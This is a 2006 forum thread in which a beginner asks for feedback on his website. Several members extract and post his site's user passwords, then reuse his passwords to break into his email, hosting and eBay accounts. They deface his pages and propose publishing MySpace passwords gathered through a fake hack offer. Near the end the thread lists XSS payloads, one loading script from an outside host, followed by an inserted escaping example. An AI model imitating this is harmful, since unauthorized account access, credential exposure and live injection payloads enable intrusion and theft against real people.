
View Full Version : My Site



trinoid
11-21-2006, 12:16 AM
Hello, I am a noob web designer just looking for some feedback. I thought this was a good forum, so please check it out and POST BACK :cool:
http://www.z-zap.com

trinoid
11-21-2006, 12:33 AM
NO POSTS, AHHH. Well, w/e, I'll just have to wait.

Moonbat
11-21-2006, 07:53 AM
It's not a security vulnerability, but there's no way you can make a login page without using a server side language like PHP or ASP. Your member login page is currently .html.

Ezekiel
11-21-2006, 12:35 PM

Comments:


Flash is not intended for website layout; especially not navigation bars - it is for animations and interactive applications. I block all flash from loading. If you expect people to browse your pages, design them with as little flash as possible.


It looks like you made your site using an automated program or template. Doing so doesn't constitute web design.


People visit websites for content - for example, this forum has information, tools, and a forum. Phrases like "under construction" remind me of the freewebs/geocities era, where websites have nothing but a contact page. You have to ask yourself, why would they contact you? You haven't done anything for them. It comes down to this: create a website after you already know what its purpose is. The UFO also comes under the 'pointless' category.


Sponsors is spelled sponsors, not sponsers.


Sorry if that sounded over-critical, but if nobody corrects you, you will never improve.


It's not a security vulnerability, but there's no way you can make a login page without using a server side language like PHP or ASP. Your member login page is currently .html.

You can make a login page in any language - all it has to do is show a form and direct the user to the login script when they click submit. However, the login script must be in a server-side language.

~~smart~fool~~
11-21-2006, 03:12 PM
Well, besides what Mike said, cough, it's pretty good.

Moonbat
11-21-2006, 04:18 PM
Either way, he needs to know about PHP (or any other server side language) so he can make a login page/script/whatever.

trinoid
11-21-2006, 06:04 PM
Well, you're right, most login pages are not made in Flash, and true, I did spell some things wrong, but it isn't a template; I made all that myself. And by the way, where my site is hosted they don't allow a lot of PHP scripts. Even though I don't know PHP, I have tried to learn but couldn't use MySQL, and part of the reason I started using this forum was to get help with that and some feedback. And by the way, thank you for the feedback.

nozf3r4tu
11-21-2006, 06:40 PM
Think of something that will give you a lot of traffic to your website. I think if you get cracking tools, password lists and stuff like that for Hotmail, Yahoo, Photobucket or MySpace you'll have tons of desperate souls wandering around your site. Just my 2 cents.... lol

trinoid
11-21-2006, 06:51 PM
That's a good idea, but I'm too noob to get those things myself, so any ideas on that? I mean, ya, I was thinking of maybe making some prank programs in VB.NET, like something that pretends to wipe hard drives or something, just to amuse people before I can get some good stuff up there like cracking tools, password lists and more! :cool: So unless I get some help, ya.

trinoid
11-26-2006, 02:39 AM
Hello people, I am starting to learn JavaScript, so I decided to redo my site. Please take another look at it.

Troll
11-26-2006, 10:59 AM
I still can't see the point of your site. Can you please tell me its purpose? :confused:

Moonbat
11-26-2006, 01:08 PM
I just got access to all the usernames/passwords for your site - all 4 of them, lol.

Check your private messages, I pm'ed you all of them.

NEVER EVER make a login script/page/whatever without using a server side language like PHP or ASP. It is very insecure.

Ezekiel
11-26-2006, 05:25 PM
Anyone who designs a login mechanism around Javascript deserves to lose their data.

Here are the usernames and passwords (the members page contains nothing though):

Username: bango20*
Password: puppies

Username: cryptosparrow
Password: dragon*4

Username: zackymcharvest
Password: dos

Username: kristen
Password: monkey

Troll
11-26-2006, 06:14 PM
Even I found all the usernames and passwords, and I'm useless...

http://z-zap.com/login.js

Moonbat
11-26-2006, 08:49 PM
mike, You didn't have to post them you know, but since the member login area doesn't really contain anything, I guess it's alright.

Also, you can go to z-zap and go to /members.html and see all the member content without having to even use any of that login information.

EDIT: Mike, did you do that to his site? That's mean..

How did you do that anyway?

trinoid
11-26-2006, 11:58 PM
Nice job lol, didn't expect anyone to try and hack it lol. Just using it for my friends, hoping to expand later, but ya, I tried to learn PHP, still trying. I used an editor but failed because I couldn't use MySQL. If someone could help me it would be much appreciated. Thank you.

Ezekiel
11-27-2006, 03:09 AM
EDIT: Mike, did you do that to his site? That's mean..

How did you do that anyway?

Did I do what to his site?

Troll
11-27-2006, 10:55 AM
Did I do what to his site?

Somebody hacked it. They changed the logo so it read "Z-Crap.com", had a scrolling marquee that read "If i used PHP my site wouldn't have been hacked", and, (for some odd reason), there was a picture of a troll :p


I tried to learn PHP, still trying. I used an editor but failed

Freewebs doesn't allow any PHP, so you'll need to find another host.

Ezekiel
11-27-2006, 11:08 AM
Somebody hacked it. They changed the logo so it read "Z-Crap.com", had a scrolling marquee that read "If i used PHP my site wouldn't have been hacked", and, (for some odd reason), there was a picture of a troll :p



Freewebs don't allow any PHP, so you'll need to find another host.

Haha, z-crap... Well, his ftp password was probably the same as the members login password, so whoever did this wasn't so great.

Moonbat
11-27-2006, 05:21 PM
there was a picture of a troll

If I didn't know any better....

Moonbat
11-27-2006, 05:23 PM
You guys know bango20*? So happens he has a freewebs site too, with the same password.

Troll
11-27-2006, 05:33 PM
Bango20* is trinoid.

He also uses the same password for everything, I checked :p

I guess that's how someone hacked his site. They must have done a whois on the domain z-zap.com, signed into the email account which is contained in the whois information, got Freewebs to send his password and username via email, signed into his Freewebs account for z-zap.com, then changed a few things..

I still wonder why there was a picture of a troll on his site though :p

I suggest trinoid changes his passwords, and doesn't use the same password for everything.

Moonbat
11-27-2006, 06:05 PM
Well, I did some redecorating on his freewebs page www.freewebs.com/bango20*

What? I couldn't resist it:D

Troll, don't act like you don't know why a troll pic was on his site.:D

trinoid
11-27-2006, 06:10 PM
Ya, I know Freewebs doesn't allow PHP, but I have a year subscription for it, so ya. I don't know of any free servers I can use, and anyways I don't know how to use MySQL.

Moonbat
11-27-2006, 06:17 PM
Well, Brad Wilehm, you can go here to learn some SQL

http://www.w*schools.com/sql/default.asp

BTW, is Blu your gf?

Troll
11-27-2006, 06:46 PM
hehe.. nice work Moonbat :p

We are cruel...

trinoid got pwned!!! Got anymore websites we can play around with?

Brad, look at this (http://www.freevirtualservers.com/free-hosting.htm).. they offer free hosting which allows PHP.

Moonbat
11-27-2006, 07:15 PM
You don't learn do you Brad.

Go back to z-zap people.

Troll
11-27-2006, 07:37 PM
Btw...

People are still sending me their MySpace passwords. I have almost *5 different ones now...

Maybe i should publish the list here? :p

Moonbat
11-27-2006, 08:00 PM
They deserve it, after all, if you had been telling the truth, they would have used that fake method to hack others.

Troll
11-27-2006, 08:07 PM
Good point,

They are willing to hack other people's accounts, therefore it's fair to publish their passwords...

It will also teach them some lessons..

I'll publish the list tomorrow, it's *am here and I need some sleep..

trinoid
11-27-2006, 08:24 PM
lol nice. Well, now what passwords do I need to change? Which ones do you know? :confused:

Troll
11-27-2006, 08:27 PM
what passwords do i need to change

Change them all.

trinoid
11-27-2006, 08:31 PM
Ok, I will, but you know that free server site that someone posted? Well, ty, but it is not supported for free in the US, so can somebody help me find a good one that allows PHP?

tocksarcle
11-27-2006, 09:37 PM
I use http://www.awardspace.com because they have good PHP hosting and MySQL databases.

trinoid
11-27-2006, 10:00 PM
I got a host, YAY, but now I need a PHP editor. Can anyone help me, where is a good free one? :D :confused:

trinoid
11-27-2006, 10:04 PM
Still can't find an editor, but ya, I made this, ha. I'm starting to learn with the two most used words in programming: http://bango20*.t*5.com/helloworld.php

Moonbat
11-27-2006, 10:15 PM
For (insert religious deity here)'s sake, learn some security man! I just h4x0r*d your new PHP site.

You can see the same message on your site.

EDIT: Did you shut down z-zap.com? I tried going to it now, which took me to OpenDNS and said that your site doesn't resolve

Troll
11-27-2006, 10:33 PM
I've added my own little message on his site too :)

Moonbat
11-27-2006, 10:35 PM
Lol, this is the most fun directly/indirectly relating to this site. Thank you all for giving me something to do besides answer questions from never-gonna-be-hackers. But I gotta hit the sack (go to sleep, for all you foreigners) so I'll be getting off now. Good night!

Troll
11-28-2006, 01:26 AM
http://bango20*.t*5.com/

Change all your passwords.


http://bango20*.t*5.com/index*.php It didn't take long.

Troll
11-28-2006, 02:57 AM
It seems you've finally taken our advice and changed your passwords. (Or someone else has changed them for you)

Well done. I hope you liked the improvement I made on http://bango20*.t*5.com/ 's homepage.

EDIT:


Hello Moonbat && Troll, I changed my passwords. I don't think that you will be able to figure this one out. I have only used it for one thing before, so good luck trying to get into this site now lol
Is that a challenge?

Troll
11-28-2006, 03:55 AM
I hope it was a challenge because I just hacked your site again...

Ask me if you want your new passwords.. your T*5.com password is still 2**00**0***6

Ezekiel
11-28-2006, 12:13 PM
I think you've all proven now that you can enter passwords into a text box when they are straight up given to you.


Still can't find an editor, but ya, I made this, ha. I'm starting to learn with the two most used words in programming: http://bango20*.t*5.com/helloworld.php

Try notepad, or any text editor.

Troll
11-28-2006, 12:16 PM
Couldn't you all have spent this time doing something useful...

Like what?

Ezekiel
11-28-2006, 12:18 PM
Like what?

I don't know, but my point is this thread became pointless after about the 5th hack.

Moonbat
11-28-2006, 06:10 PM
Well, there's nothing better to do on this site besides answer stupid questions/hack requests and expose lame scammers.

trinoid
11-28-2006, 06:44 PM
And plus, they are really helping me upgrade my security even though they may not know it, and :eek: I'm still struggling with this PHP script. Can you tell me what's wrong?


<?php

/**
*
*
* @version $Id$
* @copyright 2006
*/

$password = 'letmein';


if ($password == $_post['pass']) {

print 'logged in';
}else{

print <<<_html_

<form method="post" action=" $_server[PHP_SELF] ">
<input type="text" value="password" name="pass">
<input type="submit" Value="LOGIN">
</form>

_html_;
}
?>

ty

Moonbat
11-28-2006, 07:34 PM
Instead of using


<form method="post" action=" $_server[PHP_SELF] ">


I think action should be changed to the name of your php page that validates input, like


<form method="post" action="login.php">

trinoid
11-28-2006, 07:41 PM
THANKS ill try it

trinoid
11-28-2006, 07:43 PM
All it did was say login.php when I tried it in my editor. Should I upload it and try??

trinoid
11-28-2006, 07:56 PM
IT didn't work, OMG lol, I'm confused, that's what my book said to do.

Troll
11-28-2006, 08:10 PM
Location: Find out and I'll give you $*00

Really? Are you sure?

Moonbat
11-28-2006, 08:16 PM
trinoid, if you didn't upload your login.php (or whatever your login page is called) to the same directory as the page where the person logs in, then it won't work. You could just write it out in full like this


action="http://www.yoursite.com/login.php">

@Troll, I'm talking about exact address, not just my location. You can easily find out what city I'm in.

trinoid
11-28-2006, 08:19 PM
I got it to work, I just had to make some things variables, so ya. And I have a good editor now, I like it :D

Troll
11-28-2006, 08:23 PM
I'm talking about exact address, not just my location. You can easily find out what city I'm in.

Oh ok...


I got it to work, I just had to make some things variables, so ya, and I have a good editor now, I like it

I can't wait to hac... i mean, test the security of your website.

trinoid
11-28-2006, 08:27 PM
lol, I'm not using that for a password entry thing, it's just for testing, but ya, let me change the password, then you can try. And oh ya, don't cheat by looking at it by logging into my t*5 account.

Troll
11-28-2006, 08:32 PM
don't cheat by looking at it by logging into my t*5 account

Anyone reading this will have the same information as me, therefore if I can log into your t*5 account, anybody can.

All hackers cheat.. you need to make your site *00% secure so nobody (including me and Moonbat) can hack it

trinoid
11-28-2006, 08:35 PM
Well, I don't know how you got my new password, I just don't.

Troll
11-28-2006, 08:40 PM
It's difficult to explain (or I'm rubbish at explaining things)...

You use the same password for everything, so I only had to find out the new password for one thing (your Gmail account), then I can access everything.

trinoid
11-28-2006, 08:41 PM
Oh ok, I see, then I'm gonna go change all my passwords once more,
starting with my Gmail this time!
:cool:

trinoid
11-28-2006, 08:43 PM
WHATS MY GMAIL PASSWORD PLZ:confused:

Troll
11-28-2006, 08:43 PM
Try using different passwords for different accounts etc..

Troll
11-28-2006, 08:44 PM
It's Trollsrule .... or Trollrules ... I can't remember :p

trinoid
11-28-2006, 08:53 PM
Ok, I changed my Gmail password to the most random thing ever lols :eek:

Troll
11-28-2006, 08:55 PM
I bet you'll forget it in the future

trinoid
11-28-2006, 08:57 PM
Nope, it has significant value to me and only me :D

Troll
11-28-2006, 09:03 PM
I'm sorry Brad, try logging in to your Gmail account again.

Moonbat
11-28-2006, 09:03 PM
trinoid, you forgot to change your password to bnainc(@)**********
You also missed changing your ebay account, and you still didn't fix z-zap.com

trinoid
11-28-2006, 09:06 PM
HOW OMG HOW HOW HOW HOW!!!!!!!! lol, tell me what I need to do

Moonbat
11-28-2006, 09:14 PM
I got into your bradleywilhelm account again.

trinoid
11-28-2006, 09:19 PM
Can You Please Tell Me What I Need To Do To Make It Secure

Moonbat
11-28-2006, 09:23 PM
I'll pm you what to do.

Troll
11-28-2006, 09:27 PM
*Troll quickly changes all of Brad's passwords*

Just kidding :p

trinoid
11-28-2006, 09:28 PM
lol ya, funny, that would really suck

Moonbat
11-28-2006, 09:29 PM
Did you get my message trinoid?

Troll
11-28-2006, 09:31 PM
If you have an eBay account I assume you have a PayPal account too... don't forget to change that password too. And your MySpace password.

Moonbat
11-28-2006, 09:32 PM
He had his PayPal account's password different from the beginning.

Troll
11-28-2006, 09:34 PM
Oh yeah... that's probably right... paypal doesn't allow weak crappy passwords like "puppies"

Moonbat
11-28-2006, 09:37 PM
Finally trinoid changed his gmail passwords!

trinoid
11-28-2006, 09:38 PM
Ya, I did change both passwords and I'm working on the rest

Troll
11-28-2006, 09:38 PM
Yipeeeee!!

Moonbat
11-28-2006, 09:39 PM
Well, so ends the adventures of Troll and Moonbat on their quest to help trinoid become security-savvy.

Troll
11-28-2006, 09:41 PM
I hope it's the end :p

Moonbat
11-28-2006, 09:42 PM
I'm bored, now what'll we do?

Troll
11-28-2006, 09:44 PM
I'm bored too...

Brad- change all your passwords back

trinoid
11-28-2006, 09:44 PM
thank you very much

trinoid
11-28-2006, 09:46 PM
Ok ok, I think that I'm done. Nope, I need to change one or two more, but ty guys, this has been fun, and I hope that maybe we can be friends and not just you guys attacking my site lol. Well ya, ok, I'm gonna go finish :D I'll post back on this thread.

Moonbat
11-28-2006, 09:49 PM
Hmm, lemme test for some more XSS vulnerabilities, other than the one Mike found. If they work, a popup should come up

<img src='john.jpg' onerror='alert(document.cookie)'>

Here's one I found online

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

Yet again

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>

Different encodings: should output alert(xss) or whatever

<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#0000*06&#00000*7&#0000**8&#00000*7&#0000**5&#00000**&#0000**4&#0000*05&#0000**2&#0000**6&#0000058&#00000*7&#0000*08&#0000*0*&#0000**4&#0000**6&#0000040&#00000**&#0000088&#000008*&#000008*&#00000**&#000004*>

<IMG SRC=&#x6A&#x6*&#x76&#x6*&#x7*&#x6*&#x72&#x6*&#x70&#x74&#x*A&#x6*&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x5*&#x5*&#x27&#x2*>

<IMG SRC="jav ascript:alert('XSS');">

Using a perl thingy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<iframe src=http://ha.ckers.org/scriptlet.html>

trinoid
11-28-2006, 09:55 PM
what is that?

Moonbat
11-28-2006, 09:58 PM
It can let you run JavaScript commands on a website as if they were coming from the server.

trinoid
11-28-2006, 10:15 PM
Oh cool, so that's how you inject it, huh? Like <img src="javascript:alert("LIKE THIS?")">

trinoid
11-28-2006, 10:16 PM
<img src='javascript:alert("HELLO")'>

Moonbat
11-28-2006, 10:17 PM
Yeah, but these forums aren't vulnerable

Put this in your web browser's address bar


javascript:alert("Hello");
A popup should come up saying Hello. Injections can use any JavaScript code, it just has to be written with slightly different syntax.

trinoid
11-28-2006, 10:25 PM
Oh ok, ya, I know a little bit of Java lol, that's how you got my password

trinoid
11-29-2006, 02:17 AM
Good night guys :rolleyes:

Ezekiel
11-29-2006, 12:24 PM
I'm sure I explained about this before.

The vulnerability I found was in the search box of this website (the box in the top right of the page, next to 'latest news'), and is part of the actual website.

The vBulletin forum we are posting in now has not been coded by the makers of this website, and has no relation to a bug in the website's programming. In other words, there is a vulnerability in this website's search box, but not the forum. vBulletin is a professional forum package and is mostly free of bugs. When hundreds of thousands of people rely on it for discussions, it has a certain responsibility to protect its users. Searching for vulnerabilities in forums is totally pointless.

Forum = created by vBulletin staff.
All-nettools.com = created by all-nettools.com staff.

If a member of all-nettools staff creates a programming error, the forum remains unchanged because he didn't create the forum.


It can let you run JavaScript commands on a website as if they were coming from the server.

XSS vulnerabilities allow you to send users custom content when they request a page. The vulnerabilities allow you to inject code into a user's page. They are client-side, and have no impact on the server itself.
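
The reflected search box Ezekiel describes, as an added example (Node.js; not code from the thread, from all-nettools.com or from vBulletin): the term a user typed is echoed back inside the page. The unescaped renderer and the escaped one are run against payloads quoted from Moonbat's list, which is why the strings below look the way they do. The function names, the page wrapper and the payload selection are this example's own choices; no site is contacted.

```javascript
// Added example, not code from the thread or from the site it discusses.
// Models a search term reflected into an HTML page, unescaped and escaped.

// Payloads quoted from the thread's list, used here as constructed test input.
const PAYLOADS = [
  "<img src='john.jpg' onerror='alert(document.cookie)'>",
  "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
  "<IMG SRC=javascript:alert('XSS')>",
  '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">',
];

const PREFIX = '<p>Results for: ';
const SUFFIX = '</p>';

// Vulnerable: the term is concatenated straight into the page, so any markup
// in it becomes part of the DOM of whoever follows a link carrying that term.
function renderSearchUnsafe(term) {
  return PREFIX + term + SUFFIX;
}

// Escape the characters that can change meaning in an HTML text or quoted
// attribute context. The text still reads the same; it can no longer open a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Fixed: same page, reflected term escaped before insertion.
function renderSearchSafe(term) {
  return PREFIX + escapeHtml(term) + SUFFIX;
}

// In an HTML text context a new element can only begin with a raw '<', so the
// check for "did the term inject a tag" is whether the reflected part has one.
function reflectedPartHasTag(html) {
  const inner = html.slice(PREFIX.length, html.length - SUFFIX.length);
  return inner.includes('<');
}

// How many of the payloads survive a given renderer as live markup.
function countInjected(render) {
  return PAYLOADS.filter(p => reflectedPartHasTag(render(p))).length;
}
```

countInjected(renderSearchUnsafe) reports every payload getting through and countInjected(renderSearchSafe) reports none. The escaping shown is right for text content and for values inside quoted attributes; it is not enough on its own for the `<IMG SRC=javascript:...>` entries in the list, which attack a URL attribute, where the scheme has to be checked as well, and it is no substitute for a proper HTML serializer when the reflected value lands in script or style blocks.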

Moonbat
11-29-2006, 04:13 PM
Ah, well, I got that definition from another site anyway.

I know you told me about this before, I just wanted to keep trying. If everyone assumed everything was secure, and didn't try to find a hole in the security, hacking would cease to exist.